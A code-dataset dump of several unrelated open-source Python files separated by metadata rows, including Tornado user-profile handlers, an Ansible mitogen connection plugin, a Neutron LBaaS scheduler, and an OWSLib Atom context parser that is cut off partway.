# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
from virtaal.support.set_enumerator import UnionSetEnumerator
from virtaal.support.sorted_set import SortedSet
from basemode import BaseMode
class QuickTranslateMode(BaseMode):
"""Quick translate mode - Include only untranslated and fuzzy units."""
name = 'QuickTranslate'
display_name = _("Incomplete")
widgets = []
# INITIALIZERS #
def __init__(self, controller):
"""Constructor.
@type controller: virtaal.controllers.ModeController
@param controller: The ModeController that managing program modes."""
self.controller = controller
# METHODS #
def selected(self):
cursor = self.controller.main_controller.store_controller.cursor
if not cursor or not cursor.model:
return
indices = list(UnionSetEnumerator(
SortedSet(cursor.model.stats['untranslated']),
SortedSet(cursor.model.stats['fuzzy'])
).set)
if not indices:
self.controller.select_default_mode()
return
cursor.indices = indices
def unselected(self):
pass
| gpl-2.0 | -1,105,703,208,720,473,100 | 30.383333 | 81 | 0.688263 | false | 4.279545 | false | false | false |
Halframe/ihome_20161122 | handlers/Profile.py | 1 | 4839 | # coding=utf-8
import re
import logging
from .BaseHandler import BaseHandler
from utils.common import required_logined
from utils.response_code import RET
from utils.image_storage import storage
from config import image_url_prefix
class ProfileHandler(BaseHandler):
"""个人中心"""
@required_logined
def get(self):
user_id = self.session.data["user_id"]
try:
ret = self.db.get(
"select up_name, up_mobile, up_avatar from ih_user_profile where up_user_id=%(user_id)s", user_id=user_id)
except Exception as e:
logging.error(e)
return self.write({"errno": RET.DBERR, "errmsg": "数据库查询错误"})
if not ret:
return self.write({"errno": RET.NODATA, "errmsg": "无该用户信息"})
if ret["up_avatar"]:
img_url = image_url_prefix + ret["up_avatar"]
else:
img_url = None
data = {
"user_id": user_id,
"name": ret["up_name"],
"mobile": ret["up_mobile"],
"avatar": img_url,
}
return self.write({"errno": RET.OK, "errmsg": "OK", "data": data})
class AvatarHandler(BaseHandler):
"""用户头像修改"""
@required_logined
def post(self):
user_id = self.session.data["user_id"]
try:
avatar = self.request.files["avatar"][0]["body"]
except Exception as e:
logging.error(e)
return self.write({"errno": RET.PARAMERR, "errmsg": "参数错误"})
try:
avatar_name = storage(avatar)
except Exception as e:
logging.error(e)
avatar_name = None
return self.write({"errno": RET.THIRDERR, "errmsg": "Qiniu Error"})
try:
ret = self.db.execute(
"update ih_user_profile set up_avatar=%(avatar)s where up_user_id=%(user_id)s", avatar=avatar_name, user_id=user_id)
except Exception as e:
logging.error(e)
return self.write({"errno": RET.DBERR, "errmsg": "数据库错误"})
avatar_url = image_url_prefix + avatar_name
self.write({"errno": RET.OK, "errmsg": "OK", "avatar": avatar_url})
class NameHandler(BaseHandler):
"""
修改用户名
@param: user_id, 从session获取用户id,要求用户登录
@param: user_name, 用户提交的新用户名
@return: errno,返回的消息代码;errmsg,返回结果的消息,以及返回其他数据
"""
@required_logined
def post(self):
user_id = self.session.data["user_id"]
user_name = self.json_args.get("user_name")
if user_name in (None, ""):
return self.write({"errno": RET.PARAMERR, "errmsg": "修改的用户名不能为空"})
try:
self.db.execute("update ih_user_profile set up_name=%(user_name)s where up_user_id=%(user_id)s", user_name=user_name, user_id=user_id)
except Exception as e:
logging.error(e)
return self.write({"errno": RET.DBERR, "errmsg": "用户名已存在"})
self.session.data["name"] = user_name
self.session.save()
return self.write({"errno": RET.OK, "errmsg": "OK", "new_username": user_name})
class AuthHandler(BaseHandler):
"""
用户实名认证
"""
@required_logined
def get(self):
user_id = self.session.data["user_id"]
try:
ret = self.db.get("select up_real_name, up_id_card from ih_user_profile where up_user_id=%(user_id)s", user_id=user_id)
except Exception as e:
logging.error(e)
return self.write({"errno": RET.DBERR, "errmsg": "数据库查询错误"})
if ret["up_id_card"] not in (None, ""):
id_card = ret["up_id_card"]
id_card = id_card[:4] + "*"*len(id_card[4:-4]) + id_card[-4:]
return self.write({"errno": RET.OK, "errmsg": "OK", "real_name": ret["up_real_name"], "id_card": id_card})
@required_logined
def post(self):
real_name = self.json_args.get("real_name")
id_card = self.json_args.get("id_card")
if not all((real_name, id_card)):
return self.write({"errno": RET.PARAMERR, "errmsg": "参数不完整"})
user_id = self.session.data["user_id"]
try:
self.db.execute("update ih_user_profile set up_real_name=%(real_name)s, up_id_card=%(id_card)s where up_user_id=%(user_id)s", real_name=real_name, id_card=id_card, user_id=user_id)
except Exception as e:
logging.error(e)
return self.write({"errno": RET.DBERR, "errmsg": "数据库更新失败"})
id_card = id_card[:4] + "*"*len(id_card[4:-4]) + id_card[-4:]
return self.write({"errno":RET.OK, "errmsg":"OK", "real_name": real_name, "id_card": id_card})
| gpl-3.0 | -3,416,722,500,883,955,700 | 34.3 | 192 | 0.56679 | false | 3.143151 | false | false | false |
ConnectBox/wifi-test-framework | ansible/plugins/mitogen-0.2.3/ansible_mitogen/plugins/connection/mitogen_local.py | 1 | 3082 | # Copyright 2017, David Wilson
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
import os.path
import sys
try:
import ansible_mitogen.connection
except ImportError:
base_dir = os.path.dirname(__file__)
sys.path.insert(0, os.path.abspath(os.path.join(base_dir, '../../..')))
del base_dir
import ansible_mitogen.connection
import ansible_mitogen.process
if sys.version_info > (3,):
viewkeys = dict.keys
elif sys.version_info > (2, 7):
viewkeys = dict.viewkeys
else:
viewkeys = lambda dct: set(dct)
def dict_diff(old, new):
"""
Return a dict representing the differences between the dicts `old` and
`new`. Deleted keys appear as a key with the value :data:`None`, added and
changed keys appear as a key with the new value.
"""
old_keys = viewkeys(old)
new_keys = viewkeys(dict(new))
out = {}
for key in new_keys - old_keys:
out[key] = new[key]
for key in old_keys - new_keys:
out[key] = None
for key in old_keys & new_keys:
if old[key] != new[key]:
out[key] = new[key]
return out
class Connection(ansible_mitogen.connection.Connection):
transport = 'local'
def get_default_cwd(self):
# https://github.com/ansible/ansible/issues/14489
return self.loader_basedir
def get_default_env(self):
"""
Vanilla Ansible local commands execute with an environment inherited
from WorkerProcess, we must emulate that.
"""
return dict_diff(
old=ansible_mitogen.process.MuxProcess.original_env,
new=os.environ,
)
| mit | 6,438,423,665,345,968,000 | 34.837209 | 79 | 0.711551 | false | 4.082119 | false | false | false |
lmazuel/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2015_06_15/models/express_route_circuit_service_provider_properties.py | 10 | 1507 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ExpressRouteCircuitServiceProviderProperties(Model):
"""Contains ServiceProviderProperties in an ExpressRouteCircuit.
:param service_provider_name: The serviceProviderName.
:type service_provider_name: str
:param peering_location: The peering location.
:type peering_location: str
:param bandwidth_in_mbps: The BandwidthInMbps.
:type bandwidth_in_mbps: int
"""
_attribute_map = {
'service_provider_name': {'key': 'serviceProviderName', 'type': 'str'},
'peering_location': {'key': 'peeringLocation', 'type': 'str'},
'bandwidth_in_mbps': {'key': 'bandwidthInMbps', 'type': 'int'},
}
def __init__(self, **kwargs):
super(ExpressRouteCircuitServiceProviderProperties, self).__init__(**kwargs)
self.service_provider_name = kwargs.get('service_provider_name', None)
self.peering_location = kwargs.get('peering_location', None)
self.bandwidth_in_mbps = kwargs.get('bandwidth_in_mbps', None)
| mit | -449,456,143,287,546,560 | 40.861111 | 84 | 0.631055 | false | 4.186111 | false | false | false |
citrix-openstack-build/neutron-lbaas | neutron_lbaas/services/loadbalancer/agent_scheduler.py | 2 | 5210 | # Copyright (c) 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
import sqlalchemy as sa
from sqlalchemy import orm
from sqlalchemy.orm import joinedload
from neutron.common import constants
from neutron.db import agents_db
from neutron.db import agentschedulers_db
from neutron.db import model_base
from neutron.extensions import lbaas_agentscheduler
from neutron.i18n import _LW
from neutron.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class PoolLoadbalancerAgentBinding(model_base.BASEV2):
"""Represents binding between neutron loadbalancer pools and agents."""
pool_id = sa.Column(sa.String(36),
sa.ForeignKey("pools.id", ondelete='CASCADE'),
primary_key=True)
agent = orm.relation(agents_db.Agent)
agent_id = sa.Column(sa.String(36), sa.ForeignKey("agents.id",
ondelete='CASCADE'),
nullable=False)
class LbaasAgentSchedulerDbMixin(agentschedulers_db.AgentSchedulerDbMixin,
lbaas_agentscheduler
.LbaasAgentSchedulerPluginBase):
def get_lbaas_agent_hosting_pool(self, context, pool_id, active=None):
query = context.session.query(PoolLoadbalancerAgentBinding)
query = query.options(joinedload('agent'))
binding = query.get(pool_id)
if (binding and self.is_eligible_agent(
active, binding.agent)):
return {'agent': self._make_agent_dict(binding.agent)}
def get_lbaas_agents(self, context, active=None, filters=None):
query = context.session.query(agents_db.Agent)
query = query.filter_by(agent_type=constants.AGENT_TYPE_LOADBALANCER)
if active is not None:
query = query.filter_by(admin_state_up=active)
if filters:
for key, value in filters.iteritems():
column = getattr(agents_db.Agent, key, None)
if column:
query = query.filter(column.in_(value))
return [agent
for agent in query
if self.is_eligible_agent(active, agent)]
def list_pools_on_lbaas_agent(self, context, id):
query = context.session.query(PoolLoadbalancerAgentBinding.pool_id)
query = query.filter_by(agent_id=id)
pool_ids = [item[0] for item in query]
if pool_ids:
return {'pools': self.get_pools(context, filters={'id': pool_ids})}
else:
return {'pools': []}
def get_lbaas_agent_candidates(self, device_driver, active_agents):
candidates = []
for agent in active_agents:
agent_conf = self.get_configuration_dict(agent)
if device_driver in agent_conf['device_drivers']:
candidates.append(agent)
return candidates
class ChanceScheduler(object):
"""Allocate a loadbalancer agent for a vip in a random way."""
def schedule(self, plugin, context, pool, device_driver):
"""Schedule the pool to an active loadbalancer agent if there
is no enabled agent hosting it.
"""
with context.session.begin(subtransactions=True):
lbaas_agent = plugin.get_lbaas_agent_hosting_pool(
context, pool['id'])
if lbaas_agent:
LOG.debug('Pool %(pool_id)s has already been hosted'
' by lbaas agent %(agent_id)s',
{'pool_id': pool['id'],
'agent_id': lbaas_agent['id']})
return
active_agents = plugin.get_lbaas_agents(context, active=True)
if not active_agents:
LOG.warn(_LW('No active lbaas agents for pool %s'), pool['id'])
return
candidates = plugin.get_lbaas_agent_candidates(device_driver,
active_agents)
if not candidates:
LOG.warn(_LW('No lbaas agent supporting device driver %s'),
device_driver)
return
chosen_agent = random.choice(candidates)
binding = PoolLoadbalancerAgentBinding()
binding.agent = chosen_agent
binding.pool_id = pool['id']
context.session.add(binding)
LOG.debug('Pool %(pool_id)s is scheduled to lbaas agent '
'%(agent_id)s',
{'pool_id': pool['id'],
'agent_id': chosen_agent['id']})
return chosen_agent
| apache-2.0 | -4,766,120,125,139,007,000 | 39.387597 | 79 | 0.597889 | false | 4.260016 | false | false | false |
ryfx/modrana | modules/gui_modules/gui_qml/list_models.py | 1 | 3121 | # -*- coding: utf-8 -*-
#----------------------------------------------------------------------------
# A modRana QML GUI list models
#----------------------------------------------------------------------------
# Copyright 2013, Martin Kolman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#---------------------------------------------------------------------------
# QML list model handling
from PySide import QtCore
# partially based on the gPodderListModel
# list model
class BaseListModel(QtCore.QAbstractListModel):
def __init__(self, objects=None):
QtCore.QAbstractListModel.__init__(self)
if objects is None:
objects = []
self._objects = objects
# self.setRoleNames({0: 'data', 1: 'section'})
self.setRoleNames({0: 'data'})
def sort(self):
# Unimplemented for the generic list model
self.reset()
def insert_object(self, o):
self._objects.append(o)
self.sort()
def remove_object(self, o):
self._objects.remove(o)
self.reset()
def set_objects(self, objects):
self._objects = objects
self.sort()
def get_objects(self):
return self._objects
def get_object(self, index):
return self._objects[index.row()]
def rowCount(self, parent=QtCore.QModelIndex()):
return len(self.get_objects())
def data(self, index, role):
if index.isValid():
if role == 0:
return self.get_object(index)
elif role == 1:
return self.get_object(index).qsection
return None
class NestedListModel(BaseListModel):
def __init__(self):
BaseListModel.__init__(self)
class ListItem(QtCore.QObject):
def __init__(self, data, children=None):
if not children: children = []
QtCore.QObject.__init__(self)
self._data = data
self._children = children
changed = QtCore.Signal()
childrenChanged = QtCore.Signal()
def _getData(self):
return self._data
def _getChildCount(self):
return len(self._children)
@QtCore.Slot(int, result=QtCore.QObject)
def _getChild(self, index):
try:
return self._children[index]
except IndexError:
# index out of bounds
return None
data = QtCore.Property(QtCore.QObject, _getData, notify=changed)
childrenCount = QtCore.Property(QtCore.QObject, _getChildCount, notify=childrenChanged)
class ListItem(QtCore.QObject):
pass
| gpl-3.0 | 1,145,764,220,678,838,900 | 29.300971 | 91 | 0.59404 | false | 4.32871 | false | false | false |
gregplaysguitar/django-dps | setup.py | 2 | 1171 | #!/usr/bin/env python
import os
from setuptools import setup, find_packages
# if there's a converted (rst) readme, use it, otherwise fall back to markdown
if os.path.exists('README.rst'):
readme_path = 'README.rst'
else:
readme_path = 'README.md'
# avoid importing the module
exec(open('dps/_version.py').read())
setup(
name='django-dps',
version=__version__,
packages=find_packages(),
license='BSD License',
url="https://github.com/gregplaysguitar/django-dps/",
maintainer="Greg Brown",
maintainer_email="[email protected]",
description='Django integrations for the DPS payment gateway',
long_description=open(readme_path).read(),
install_requires=[
'Django>=1.7',
],
include_package_data=True,
package_data={},
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Framework :: Django',
'License :: OSI Approved :: BSD License',
],
)
| bsd-2-clause | 8,254,026,549,920,261,000 | 24.456522 | 78 | 0.6345 | false | 3.877483 | false | false | false |
profkronholm/COSCnotes | COSCnotes/day016/assigngroups.py | 1 | 1717 | #!/usr/bin python
# simple script to select group of students at random.
# Written by Bill Kronholm
# Sep 1, 2014
# No rights reserved.
from random import shuffle
from time import strftime
import subprocess # used for printing
# list of students names as strings
students = [
"Karmen Rosebrock",
"Erna Halm",
"Krystle Poage",
"Dori Renick",
"Scot Mayr",
"Kenyetta Fyock",
"Nicola Wind",
"Janee Garibaldi",
"Dot Tinkham",
"Kathy Christian",
"Kym Costigan",
"Sharolyn Rondon",
"Samira Poudrier",
"Cythia Licon",
"Madelene Sherry",
"Ignacia Riemann",
"Vince Edmundson",
"Sharyl Buch",
"Mayola Balk",
"Leonia Simek"
]
groupsize = 3 # how many people in each group
numberofstudents = len(students)
numberofgroups = numberofstudents/groupsize
groups = {n:[] for n in range(numberofgroups)}
shuffle(students) # randomize the list
n=0
# separate into groups
while len(students) > 0:
groups[n].append(students.pop(0))
n = (n+1)%numberofgroups
# txt file to save to
today = strftime("%Y%m%d")
f = open(today+".txt", 'w')
# print them out and save to txt file
for key in groups.keys():
print "Group", key
f.write("Group "+str(key)+"\n")
for x in groups[key]:
f.write(x+"\n")
print x
f.write("\n")
print ""
# close the txt file
f.close()
# open the txt file for reading
f = open(today+".txt", 'r')
# print the txt file
# code taken from
# http://stackoverflow.com/questions/12723818/print-to-standard-printer-from-python
lpr = subprocess.Popen("/usr/bin/lpr", stdin = subprocess.PIPE)
lpr.stdin.write(f.read())
# close the txt file again
f.close()
print "Done. Go check the printer."
| gpl-2.0 | 6,200,605,508,681,465,000 | 20.197531 | 83 | 0.655795 | false | 2.960345 | false | false | false |
ocefpaf/OWSLib | owslib/owscontext/atom.py | 5 | 37822 | # -*- coding: utf-8 -*-
# =============================================================================
# Authors : Alexander Kmoch <[email protected]>
#
# =============================================================================
"""
API for OGC Web Services Context Document (OWS Context) format.
ATOM XML Encoding: http://www.opengeospatial.org/standards/owc
OGC OWS Context Atom Encoding Standard 1.0 (12-084r2)
"""
from owslib.etree import etree, ParseError
from owslib import util
from owslib.namespaces import Namespaces
from owslib.util import nspath_eval, element_to_string
from owslib.util import log
from owslib.owscontext.common import is_empty, extract_p, \
try_int, try_float
# default variables
add_namespaces = {"georss": "http://www.georss.org/georss",
"owc": "http://www.opengis.net/owc/1.0",
"xml": "http://www.w3.org/XML/1998/namespace"}
def get_namespaces():
n = Namespaces()
ns = n.get_namespaces(["atom", "dc", "gml", "gml32", "xlink"])
ns.update(add_namespaces)
ns[None] = n.get_namespace("atom")
return ns
ns = get_namespaces()
def nspv(path):
"""
short-hand syntax seen in waterml2.py
:param path: xpath namespace aware
:return: xml element
"""
return nspath_eval(path, ns)
def ns_elem(ns_prefix, elem_name):
ns_uri = ns.get(ns_prefix)
if ns_uri is not None:
return """{%(ns_uri)s}%(elem_name)s""" % {"ns_uri": ns_uri,
"elem_name": elem_name}
def parse_owc_content(content_node):
    """
    parse an owc:content (or owc:request) node into a content dict

    :param content_node: xml element of the owc:content node
    :return: dict with type, url, content and title
    """
    mimetype = util.testXMLAttribute(content_node, 'type')
    url = util.testXMLAttribute(content_node, 'href')
    title = util.testXMLAttribute(content_node, 'title')
    child_elem = None
    if len(list(content_node)) > 0:
        child_elem = element_to_string(
            list(content_node)[0], False)
        if isinstance(child_elem, bytes):
            # element_to_string may return bytes; keep the dict json-friendly
            child_elem = child_elem.decode('utf-8')
    content_dict = {
        "type": mimetype,
        "url": url,
        "content": child_elem,
        "title": title
    }
    return content_dict
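# A minimal sketch of the dict shape parse_owc_content returns, assuming an
# <owc:content type="image/tiff" href="http://example.com/cea.tif"
# title="example"/> node without inline children (URL is illustrative):
#
#   {"type": "image/tiff", "url": "http://example.com/cea.tif",
#    "content": None, "title": "example"}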
def parse_entry(entry_node):
"""
    parse an atom entry into a feature/resource dict to build OwcResource from
:param entry_node: xml element root node of the atom:entry
:return: dictionary for OwcResource.from_dict()
"""
resource_base_dict = {
"type": "Feature",
"id": None,
"geometry": None,
"properties": {
'title': None,
'abstract': None,
'updated': None,
'date': None,
'authors': [],
'publisher': None,
'rights': None,
'categories': [],
"links": {
"alternates": [],
"previews": [],
"data": [],
"via": [],
},
'offerings': [],
'active': None,
'minscaledenominator': None,
'maxscaledenominator': None,
'folder': None
}
}
# <id>ftp://ftp.remotesensing.org/pub/geotiff/samples/gdal_eg/cea.txt</id>
val = entry_node.find(util.nspath_eval('atom:id', ns))
id = util.testXMLValue(val)
# log.debug("entry :id %s :: %s", id, val)
resource_base_dict.update({"id": id})
# <title>GeoTIFF Example</title>
val = entry_node.find(util.nspath_eval('atom:title', ns))
title = util.testXMLValue(val)
# log.debug("entry: title %s :: %s", id, val)
resource_base_dict['properties'].update({"title": title})
# <updated>2011-11-01T00:00:00Z</updated>
val = entry_node.find(util.nspath_eval('atom:updated', ns))
update_date = util.testXMLValue(val)
# log.debug("entry: updated %s :: %s", update_date, val)
resource_base_dict['properties'].update({"updated": update_date})
# <dc:publisher>
val = entry_node.find(util.nspath_eval('dc:publisher', ns))
publisher = util.testXMLValue(val)
# log.debug("entry: dc:publisher %s :: %s", publisher, val)
resource_base_dict['properties'].update({"publisher": publisher})
# <dc:rights>
val = entry_node.find(util.nspath_eval('dc:rights', ns))
rights = util.testXMLValue(val)
# log.debug("entry: rights %s :: %s", rights, val)
resource_base_dict['properties'].update({"rights": rights})
# <georss:where>
val = entry_node.find(util.nspath_eval('georss:where', ns))
if val is not None:
if len(list(val)) > 0:
xmltxt = element_to_string(
list(val)[0], False)
# TODO here parse geometry??
# log.debug("entry: geometry %s :: %s", xmltxt, val)
resource_base_dict.update({"geometry": xmltxt.decode('utf-8')})
# <content type = "text" > aka subtitle, aka abstract
val = entry_node.find(util.nspath_eval('atom:content', ns))
subtitle = util.testXMLValue(val)
# log.debug("entry: subtitle %s :: %s", subtitle, val)
resource_base_dict['properties'].update({"abstract": subtitle})
# <author> ..
# <name>
# <email>
vals = entry_node.findall(util.nspath_eval('atom:author', ns))
authors = []
for val in vals:
val_name = val.find(util.nspath_eval('atom:name', ns))
val_email = val.find(util.nspath_eval('atom:email', ns))
val_uri = val.find(util.nspath_eval('atom:uri', ns))
name = util.testXMLValue(val_name)
email = util.testXMLValue(val_email)
uri = util.testXMLValue(val_uri)
author = {
"name": name,
"email": email,
"uri": uri
}
# log.debug("entry: author %s :: %s", author, vals)
if not is_empty(author):
authors.append(author)
resource_base_dict['properties'].update({"authors": authors})
# <link rel="enclosure" type="image/png"
# length="12345" title="..." href="http://o..."/>
# <link rel="icon" type="image/png" title="Preview f..."
# href="http://..."/>
# <link rel="via" type="application/vnd.ogc.wms_xml"
# title="Original .." href="...."/>
vals = entry_node.findall(util.nspath_eval('atom:link', ns))
links_alternates = []
links_previews = []
links_data = []
links_via = []
for val in vals:
rel = util.testXMLAttribute(val, 'rel')
href = util.testXMLAttribute(val, 'href')
mimetype = util.testXMLAttribute(val, 'type')
lang = util.testXMLAttribute(val, 'lang')
title = util.testXMLAttribute(val, 'title')
length = util.testXMLAttribute(val, 'length')
link = {
"href": href,
"type": mimetype,
"length": length,
"lang": lang,
"title": title,
"rel": rel
}
# log.debug("entry: link %s :: %s", link, vals)
if link.get("rel") == "alternate" and not is_empty(link):
links_alternates.append(link)
elif link.get("rel") == "icon" and not is_empty(link):
links_previews.append(link)
elif link.get("rel") == "enclosure" and not is_empty(link):
links_data.append(link)
elif link.get("rel") == "via" and not is_empty(link):
links_via.append(link)
else:
log.warn(
"unknown link type in Ows Resource entry section: %r", link)
resource_base_dict['properties']['links'].update(
{"alternates": links_alternates})
resource_base_dict['properties']['links'].update(
{"previews": links_previews})
resource_base_dict['properties']['links'].update({"data": links_data})
resource_base_dict['properties']['links'].update({"via": links_via})
# <owc:offering code="http://www.opengis.net/spec/owc-at...">
# <owc:content type="image/tiff" href=".."
# <owc:offering code="http://www.opengis.net/spec....l">
# <owc:content type="application/gml+xml">
# <owc:operation code="GetCapabilities" method="GET"
# type="applica..." href="..."
# <owc:request type="application/xml"> ..
# <owc:styleSet>
# <owc:name>raster</owc:name>
# <owc:title>Default Raster</owc:title>
# <owc:abstract>A sample style that draws a </owc:abstract>
# <owc:legendURL href="h...." type="image/png"/>
# </owc:styleSet>
offering_nodes = entry_node.findall(util.nspath_eval('owc:offering', ns))
offerings = []
for offering_node in offering_nodes:
offering_code = util.testXMLAttribute(offering_node, 'code')
operations = []
contents = []
styles = []
operation_nodes = offering_node.findall(
util.nspath_eval('owc:operation', ns))
for op_val in operation_nodes:
operations_code = util.testXMLAttribute(op_val, 'code')
http_method = util.testXMLAttribute(op_val, 'method')
mimetype = util.testXMLAttribute(op_val, 'type')
request_url = util.testXMLAttribute(op_val, 'href')
            req_content_val = op_val.find(util.nspath_eval('owc:request', ns))
req_content = None
if req_content_val is not None:
req_content = parse_owc_content(req_content_val)
# TODO no example for result/response
op_dict = {
"code": operations_code,
"method": http_method,
"type": mimetype,
"href": request_url,
"request": None if is_empty(req_content) else req_content,
"result": None
}
# log.debug("entry: operation %s :: %s", op_dict, vals)
if not is_empty(op_dict):
operations.append(op_dict)
content_nodes = offering_node.findall(
util.nspath_eval('owc:content', ns))
for cont_val in content_nodes:
content_dict = parse_owc_content(cont_val)
# log.debug("entry: content_dict %s :: %s", content_dict, vals)
if not is_empty(content_dict):
contents.append(content_dict)
style_nodes = offering_node.findall(
util.nspath_eval('owc:styleSet', ns))
for style_val in style_nodes:
val_name = style_val.find(util.nspath_eval('owc:name', ns))
val_title = style_val.find(util.nspath_eval('owc:title', ns))
val_abstr = style_val.find(util.nspath_eval('owc:abstract', ns))
val_uri = style_val.find(util.nspath_eval('owc:legendURL', ns))
name = util.testXMLValue(val_name)
title = util.testXMLValue(val_title)
abstr = util.testXMLValue(val_abstr)
legend_url = util.testXMLAttribute(val_uri, 'href')
style_set = {
"name": name,
"title": title,
"abstract": abstr,
"default": None,
"legendURL": legend_url,
"content": None
}
# log.debug("entry: style_set %s :: %s", style_set, vals)
if not is_empty(style_set):
styles.append(style_set)
offering_dict = {
"code": offering_code,
"operations": operations,
"contents": contents,
"styles": styles
}
if offering_code is not None:
offerings.append(offering_dict)
resource_base_dict['properties'].update(
{"offerings": offerings})
# TODO no examples for active attribute
# <owc:minScaleDenominator>2500</owc:minScaleDenominator>
val = entry_node.find(util.nspath_eval('owc:minScaleDenominator', ns))
min_scale_denominator = util.testXMLValue(val)
# log.debug("entry: min-scale-... %s :: %s", min_scale_denominator, val)
resource_base_dict['properties'].update(
{"minscaledenominator": min_scale_denominator})
# <owc:maxScaleDenominator>25000</owc:maxScaleDenominator>
val = entry_node.find(util.nspath_eval('owc:maxScaleDenominator', ns))
max_scale_denominator = util.testXMLValue(val)
# log.debug("entry: max_scale_... %s :: %s", max_scale_denominator, val)
resource_base_dict['properties'].update(
{"maxscaledenominator": max_scale_denominator})
# TODO no examples for folder attribute
return resource_base_dict
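# Hedged usage sketch for parse_entry: it expects an already-parsed atom:entry
# element, e.g. one taken from a feed tree (variable names are illustrative):
#
#   feed_root = etree.fromstring(atom_bytes)
#   entries = feed_root.findall(util.nspath_eval('atom:entry', ns))
#   resource_dicts = [parse_entry(e) for e in entries]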
def decode_atomxml(xml_string):
"""
here parse atom xml to a dict for instanciating of OWC:Context
:param xmlstring:
:return: OwcContext-ready dict
"""
context_base_dict = {
"type": "FeatureCollection",
"id": None,
"bbox": None,
"properties": {
"lang": None,
"links": {
"profiles": [],
"via": [],
},
'title': None,
'abstract': None,
'updated': None,
'authors': [],
'publisher': None,
'generator': None,
'display': None,
'rights': None,
'date': None,
'categories': [],
},
'features': []
}
feed_root = etree.fromstring(xml_string)
    # the feed root may carry an xml:lang attribute, e.g. <feed xml:lang="en">
lang = util.testXMLAttribute(
feed_root, '{http://www.w3.org/XML/1998/namespace}lang')
# log.debug("lang %s ", lang)
context_base_dict['properties'].update({"lang": lang})
# <id>
val = feed_root.find(util.nspath_eval('atom:id', ns))
id = util.testXMLValue(val)
# log.debug("id %s :: %s", id, val)
context_base_dict.update({"id": id})
# <link rel="profile"
# href="http://www.opengis.net/spec/owc-atom/1.0/req/core"
# title="compliant bla bla"
# < link rel = "via" type = "application/xml" href = "..." title = "..."
vals = feed_root.findall(util.nspath_eval('atom:link', ns))
links_profile = []
links_via = []
for val in vals:
rel = util.testXMLAttribute(val, 'rel')
href = util.testXMLAttribute(val, 'href')
mimetype = util.testXMLAttribute(val, 'type')
lang = util.testXMLAttribute(val, 'lang')
title = util.testXMLAttribute(val, 'title')
length = util.testXMLAttribute(val, 'length')
link = {
"href": href,
"type": mimetype,
"length": length,
"lang": lang,
"title": title,
"rel": rel
}
# log.debug("link %s :: %s", link, vals)
if link.get("rel") == "profile" and not is_empty(link):
links_profile.append(link)
elif link.get("rel") == "via" and not is_empty(link):
links_via.append(link)
else:
log.warn("unknown link type in Ows Context section: %r", link)
context_base_dict['properties']['links'].update(
{"profiles": links_profile})
context_base_dict['properties']['links'].update({"via": links_via})
# <title>
val = feed_root.find(util.nspath_eval('atom:title', ns))
title = util.testXMLValue(val)
# log.debug("title %s :: %s", title, val)
context_base_dict['properties'].update({"title": title})
# <subtitle type = "html"
val = feed_root.find(util.nspath_eval('atom:subtitle', ns))
subtitle = util.testXMLValue(val)
# log.debug("subtitle %s :: %s", subtitle, val)
context_base_dict['properties'].update({"abstract": subtitle})
# <author> ..
# <name>
# <email>
vals = feed_root.findall(util.nspath_eval('atom:author', ns))
authors = []
for val in vals:
val_name = val.find(util.nspath_eval('atom:name', ns))
val_email = val.find(util.nspath_eval('atom:email', ns))
val_uri = val.find(util.nspath_eval('atom:uri', ns))
name = util.testXMLValue(val_name)
email = util.testXMLValue(val_email)
uri = util.testXMLValue(val_uri)
author = {
"name": name,
"email": email,
"uri": uri
}
# log.debug("author %s :: %s", author, vals)
if not is_empty(author):
authors.append(author)
